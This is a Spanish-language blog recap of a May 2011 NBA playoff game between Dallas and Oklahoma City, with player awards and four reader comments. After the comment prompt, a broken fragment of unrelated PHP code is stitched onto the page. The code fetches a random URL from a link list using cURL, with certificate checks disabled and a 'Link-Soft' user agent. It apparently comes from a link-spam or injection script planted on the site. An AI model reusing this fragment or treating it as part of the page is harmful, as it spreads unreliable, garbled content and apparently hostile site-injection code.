La Crónica (21/05/2011): Enter The Matrix

22 de May de 2011 por TheDeerHunter

Velada negra para los ejecutores de Mavs y Thunder. Nowitzki 7 de 21 añadiendo 7 pérdidas, Terry 3 de 12, Durant 7 de 22 y Westbrook no estuvo tan mal lanzando pero perdió 7 posesiones también. Tampoco fue el día del “poder del banquillo” ni por un bando ni por el otro. No fue la noche de Barea, de Stojakovic, de Harden, ni mucho menos de Maynor, que apenas rascó bola.

Los Thunder se presentaron ante la mejor oportunidad que han disfrutado las últimas décadas naufragando por varias vías. La más sonrojante fue que sólo un equipo ha lanzado de tres peor que ellos en los últimos 20 años de playoffs. Precisamente fueron los Mavericks en el 2005 con un 1 de 18. Ayer ellos marcaron un 1 de 17, esto es un  5.9% sonando aún más fuerte en porcentaje.

La presión es una pesada carga y crece ronda tras ronda. Para saber sobrellevarla suele ser mejor haberla conocido. La experiencia es un grado.
En cuántas ocasiones un partido feo como el de ayer lo ha resuelto un jugador de rol veterano. Fisher, Horry, Posey, Artest… ayer le tocó al que antaño se le conoció como The Matrix. Digo antaño porque a Shawn Marion hace mucho que la mayoría de gente le daba por acabado. Ayer fue el mejor de los suyos. Brilló casi como en su época de los Suns, también al lado de Kidd quien le sabe sacar tanto partido. Chandler apuntaló al equipo y dejaron que los Thunder se estrellaran contra sus propios miedos, antes de que se dieran cuenta que los Mavs tampoco estaban para tirar cohetes.

Tras un déficit de 23 puntos el partido estaba casi perdido antes del descanso. La reacción de manos de Westbrook fue muy meritoria y llegaron a amenazar el resultado. Pero cuando quedaban apenas 6 minutos para terminar y los Thunder coqueteaban con los 6 puntos de diferencia apareció Nowitzki. Apaga y vámonos. Los Mavericks tienen una oportunidad única de dejar esto sentenciado la madrugada del lunes al martes.

MVP: Shawn Marion. Además de sus buenos 18 puntos con un 9 de 13, 4 rebotes, 2 tapones y 2 robos es una satisfacción que tu par estelar se vaya del partido de la forma que lo hizo Durant.

La sorpresa: El factor X de los Thunder cumplió con lo suyo. Collison amargó la noche a Nowitzki y registró unos números muy a tener en cuenta. 9 puntos sin fallo, 6 rebotes, 2 tapones, 2 robos y 1 asistencia. Anoche Scott Brooks se equivocó claramente de no darle más minutos a él en lugar de un Ibaka que hizo aguas por todos lados.

La decepción: Hemos hablado del horrible e histórico porcentaje de 3 de Thunder… pero aún fue mejor el colectivo que el individual de Durant. 0 de 8 nada menos. También resulta decepcionante que tras el partidazo que se cascó Harden el pasado choque tocaba irremediablemente la de arena. Un jugador llamado a hacer grandes cosas de no ser por su tremenda irregularidad.

El mayor esfuezo en vano: No está teniendo unos playoffs tan brillantes como muchos esperamos, pero ayer Westbrook se tiró el equipo exclusivamente a su espalda y estuvo a punto de liarla. 30 puntos, 4 asistencias, 2 rebotes y 2 robos. Con alguna asistencia más y alguna pérdida menos posiblemente estaríamos hablando de otra cosa ahora mismo.

Comenta

4 comentarios a esta entrada

  1. manuu dice:
    #1

    Menos mal que Westbrook es tan rápido y hábil, que si no con esa cabeza que tiene no podría ni jugar a baloncesto. Menudo loco, el base peor base que he visto en mi vida, cada día me gusta menos, y eso que ayer no fue su peor partido ni mucho menos.
    A los Thunder les pudo la presión, veo una final Dallas-Miami, aunque los amiguitos de Florida tendrán que sufrir más para eliminar a Chicago.

      Citar

  2. jas dice:
    #2

    Estaria muy bien un post sobre el tema del dopaje en la nba, a raiz d las declaraciones d derrick rose criticando esta situacion en la liga

      Citar

  3. TX dice:
    #3

    Pues si tuviera que decir un jugador que se dopase, el que primero diría sería Derrick Rose jaja

      Citar

  4. GreenPride dice:
    #4

    Partido indigno de unas finales de conferencia. Los dos primeros habían dejado grandes sensaciones y un juego fenomenal de las estrellas. En este los Thunder no salieron a jugar y cuando se dieron cuenta iban 25 abajo. A partir de ahí un querer y no poder de Durant y Westbrook en plan me las chupo todas a ver si entran, nada de juego en equipo y muchas entradas sin sentido a canasta. Aún así se acercaron mucho porque los Mavs también dejaron de jugar en la segunda parte sólo para administrar su ventaja y les pudo constar bien caro. Veremos si se le pasa la caraja en el 4º porque este partido ha sido un verdadero toston.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>